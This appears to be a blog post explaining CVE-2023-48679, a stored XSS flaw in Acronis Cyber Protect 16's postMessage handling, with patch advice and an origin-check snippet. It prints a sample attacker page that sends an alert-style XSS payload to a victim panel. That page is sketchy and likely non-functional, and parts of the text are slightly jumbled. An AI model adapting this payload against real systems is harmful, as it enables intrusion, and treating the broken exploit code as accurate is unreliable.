In late 2023, a serious vulnerability was uncovered in Acronis Cyber Protect 16—one of the most widely used backup and cyber protection tools for businesses. This flaw, tracked as CVE-2023-48679, exposes systems to a stored cross-site scripting (XSS) attack by failing to validate the origin in postMessage calls. Here, we break down what happened, how it works, and show practical exploitation examples.
What is CVE-2023-48679?
CVE-2023-48679 describes a persistent or stored XSS vulnerability found in Acronis Cyber Protect 16 (Linux and Windows platforms) before build 37391. The flaw is specifically in the web interface's handling of the postMessage API, a mechanism used in JavaScript for safely communicating between different windows or iframes.
When an application uses postMessage, it's crucial to check that incoming messages really come from a trusted origin. Without this, anyone with access to the web interface can inject shady scripts that Acronis’s application will execute—compromising the whole protection layer.
Why is Missing Origin Validation Dangerous?
If the web app receives messages via postMessage but doesn’t validate the message's origin, it opens a door for attackers. They can upload a crafted HTML file or trick a victim into opening a malicious site. This site then sends JavaScript code to the Acronis web app, which will run in the context of the victim (usually an admin). If the payload is stored, it will execute every time someone loads a specific page.
How the Exploit Works (Step by Step)
1. Attacker crafts a malicious webpage that uses JavaScript to send a postMessage to the Acronis panel.
2. Target (admin) visits the attacker’s page—possibly via social engineering or a malicious link.
The malicious script sends a stored XSS payload to the vulnerable Acronis web interface.
4. If the payload is saved in the application (persistent), it triggers every time users open the affected interface page.
Below is a very basic exploit HTML that could be used by an attacker
<!-- attacker.html -->
<html>
<body>
<script>
// Replace URL with actual Acronis panel address
var acronisUrl = "https://victim-acronis.example.com:44445";;
var xssPayload = "<script>alert('XSS via CVE-2023-48679!')</script>";
// Message object might need to match app expectations
var message = {
action: "storeData", // hypothetical
data: xssPayload
};
window.onload = function() {
// Send the payload to the main panel
window.open(acronisUrl);
setTimeout(function() {
window.postMessage(message, "*"); // * means no origin checking!
}, 100);
};
</script>
<h1>If you see this, XSS attempt has been sent.</h1>
</body>
</html>
Critical flaw: If the Acronis app accepts this message without checking event.origin, the payload will be stored and executed later within the app.
Patch & Mitigation
- Update Now: If you’re using Acronis Cyber Protect 16, update to build 37391 or later immediately. Official advisory (note: URL may change).
- Manually check your code/apps for window.addEventListener('message', ...) handlers, and ensure you verify the event.origin before acting.
To do this safely, always check the message’s origin before using the data
window.addEventListener("message", function(event) {
// Only accept messages from your own site!
if (event.origin !== "https://your-acronis-domain.com:44445";) {
return; // Ignore suspicious messages
}
// Safe to handle event.data here
}, false);
Manipulation or deletion of critical backups
Because backups are a last line of defense, an XSS bug here is very serious.
Why This XSS Is Worse Than the Usual
Unlike plain reflected XSS, stored XSS means that the malicious code sits on the server and is triggered for every user who views the infected data. Combined with admin-level access, attackers could sabotage backup jobs, exfiltrate sensitive information, or use the backup server as a launchpad for wider network attacks.
Links & References
- 📝 NVD Entry for CVE-2023-48679
- 🦺 Acronis Security Advisory SEC-2023-23
- 📚 MDN Web Docs - Window.postMessage()
- ✅ How to validate postMessage origin (OWASP)
Conclusion
CVE-2023-48679 reminds us why rigorous origin validation is not optional for modern web apps. If you’re running Acronis Cyber Protect 16, patch immediately—this is not a vulnerability to ignore!
If you run any web service that accepts postMessage, be sure to verify the event.origin every single time.
Stay safe, and always keep your cyber protection tools up-to-date.
Timeline
Published on: 02/27/2024 17:15:10 UTC
Last modified on: 02/28/2024 14:07:00 UTC